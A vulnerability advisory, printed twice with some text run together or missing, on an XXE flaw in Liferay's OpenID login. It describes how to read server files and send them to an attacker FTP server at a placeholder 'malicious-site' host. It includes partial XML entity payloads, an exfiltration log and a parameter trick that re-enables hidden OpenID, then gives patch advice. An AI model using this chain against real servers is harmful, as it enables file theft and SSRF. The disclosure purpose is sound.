# XML External Entity XXE vulnerability in OpenID component of Liferay- Author: Sandro Gauci - Vulnerable version: Liferay 6.2.3 CE GA4 and earlier- Liferay reference: LPS-58014- Advisory URL:ray-xxe>- Timeline:- Report date: March 16 2015- Liferay patch: August 26 2015- Liferay advisory: January 18 2016- Enable Security advisory: June 1 2016## DescriptionLiferay supports OpenID login which was found to make use of a versionof `openid4java` that is vulnerable to XML External Entity (XXE)attacks.## ImpactAbuse of the XXE vulnerability can (at least) lead to local filedisclosure, server-side request forgery (SSRF) and denial of service.This vulnerability was abused to read local files on the web serverthat the web application had access to.## How to reproduce the issueThis issue was previously discovered to affect [one of Google's webserver](http://ift.tt/1sObmti)which was using the same OpenID library.To abuse this vulnerability, an attacker needs to:1. Force Liferay to make use of OpenID for authentication2. Provide an attacker-controlled URL (web location) as the OpenID URL.This URL should contain malicious XML (see below)3. Upon reading the XML, the OpenID library will attempt to load theexternal entity on the attacker's web server4. This external entity instructs the library to read a file from localdisk and make use of it's contents to load another file from an attackercontrolled (custom) FTP serverThus the contents of the file to be read are sent to the custom FTPserver. During exploitation, we had to make use of a fake FTP server(from information. However, it might be possible to use HTTP and otherprotocols too depending on the version of Java used and othervariables.For step 1, the attacker needs to locate the authentication form inLiferay and then click on the OpenID link. The attacker then specifies as an OpenID URL. This website would contain thefollowing:```htmlcontent="http://malicious-site/yadis.xml">```As the OpenID library reads that, it loads `yadis.xml` which wouldcontain thefollowing:```xml%asd;%rrr;]>```This loads `xxe.xml` which in turn would contain the following:'http://ftpmalicious-site:443/%b;'>">%c;Once the XML interpreter parses these contents, it connects to the FTPsite, sending the contents of the root directory on the server as canbe seen in the following log:> sudo ruby xxe-ftp-server.rbFTP. New client connected< USER anonymous< PASS Java1.6.0_21@> 230 more data please!< TYPE I> 230 more data please!< EPSV ALL> 230 more data please!< EPSV> 230 more data please!< EPRT |1|172.x.x.x|39051|> 230 more data please!< bin> 230 more data please!< boot> 230 more data please!< dev> 230 more data please!< etc> 230 more data please!< home> 230 more data please!... etcDirectories and also local files could be read using this method.Note that sometimes the OpenID login method is hidden but thefunctionality is not disabled from within Liferay itself. In such cases,it is possible to force Liferay to make use of OpenID anyway by settingthe `_58_struts_action` parameter from `/login/login` to`/login/open_id`.## Solutions and recommendationsUpgrading to the latest version of Liferay should address thissecurity vulnerability. The patch was published at the followinglocation:Additionally, to address this issue it is recommended to disableOpenID support.## Further reading- - ## About Enable Security[Enable Security](http://ift.tt/1WZX4SZ) provides InformationSecurity services, including Penetration Testing, Research andDevelopment, to help protect client networks and applications againstonline attackers.## DisclaimerThe information in the advisory is believed to be accurate at thetime of publishing based on currently available information. Use of theinformation constitutes acceptance for use in an AS IS condition. Thereare nowarranties with regard to this information. Neither the author nor thepublisheraccepts any liability for any direct, indirect, or consequential loss ordamagearising from use of, or reliance on, this information.[ reply ]from SecurityFocus Vulnerabilities http://ift.tt/1WZX19P
# XML External Entity XXE vulnerability in OpenID component of Liferay
- Author: Sandro Gauci
- Vulnerable version: Liferay 6.2.3 CE GA4 and earlier
- Liferay reference: LPS-58014
- Advisory URL:
ray-xxe>
- Timeline:
- Report date: March 16 2015
- Liferay patch: August 26 2015
- Liferay advisory: January 18 2016
- Enable Security advisory: June 1 2016
## Description
Liferay supports OpenID login which was found to make use of a version
of `openid4java` that is vulnerable to XML External Entity (XXE)
attacks.
## Impact
Abuse of the XXE vulnerability can (at least) lead to local file
disclosure, server-side request forgery (SSRF) and denial of service.
This vulnerability was abused to read local files on the web server
that the web application had access to.
## How to reproduce the issue
This issue was previously discovered to affect [one of Google's web
server](http://ift.tt/1sObmti)
which was using the same OpenID library.
To abuse this vulnerability, an attacker needs to:
1. Force Liferay to make use of OpenID for authentication
2. Provide an attacker-controlled URL (web location) as the OpenID URL.
This URL should contain malicious XML (see below)
3. Upon reading the XML, the OpenID library will attempt to load the
external entity on the attacker's web server
4. This external entity instructs the library to read a file from local
disk and make use of it's contents to load another file from an attacker
controlled (custom) FTP server
Thus the contents of the file to be read are sent to the custom FTP
server. During exploitation, we had to make use of a fake FTP server
(from as an OpenID URL. This website would contain the
information. However, it might be possible to use HTTP and other
protocols too depending on the version of Java used and other
variables.
For step 1, the attacker needs to locate the authentication form in
Liferay and then click on the OpenID link. The attacker then specifies
following:
```html
content="http://malicious-site/yadis.xml">
```
As the OpenID library reads that, it loads `yadis.xml` which would
contain the
following:
```xml
%asd;
%rrr;
]>
```
This loads `xxe.xml` which in turn would contain the following:
'http://ftpmalicious-site:443/%b;'>">
%c;
Once the XML interpreter parses these contents, it connects to the FTP
site, sending the contents of the root directory on the server as can
be seen in the following log:
> sudo ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
< PASS Java1.6.0_21@
> 230 more data please!
< TYPE I
> 230 more data please!
< EPSV ALL
> 230 more data please!
< EPSV
> 230 more data please!
< EPRT |1|172.x.x.x|39051|
> 230 more data please!
< bin
> 230 more data please!
< boot
> 230 more data please!
< dev
> 230 more data please!
< etc
> 230 more data please!
< home
> 230 more data please!
... etc
Directories and also local files could be read using this method.
Note that sometimes the OpenID login method is hidden but the
functionality is not disabled from within Liferay itself. In such cases,
it is possible to force Liferay to make use of OpenID anyway by setting
the `_58_struts_action` parameter from `/login/login` to
`/login/open_id`.
## Solutions and recommendations
Upgrading to the latest version of Liferay should address this
security vulnerability. The patch was published at the following
location:
Additionally, to address this issue it is recommended to disable
OpenID support.
## Further reading
-
-
## About Enable Security
[Enable Security](http://ift.tt/1WZX4SZ) provides Information
Security services, including Penetration Testing, Research and
Development, to help protect client networks and applications against
online attackers.
## Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no
warranties with regard to this information. Neither the author nor the
publisher
accepts any liability for any direct, indirect, or consequential loss or
damage
arising from use of, or reliance on, this information.
[ reply ]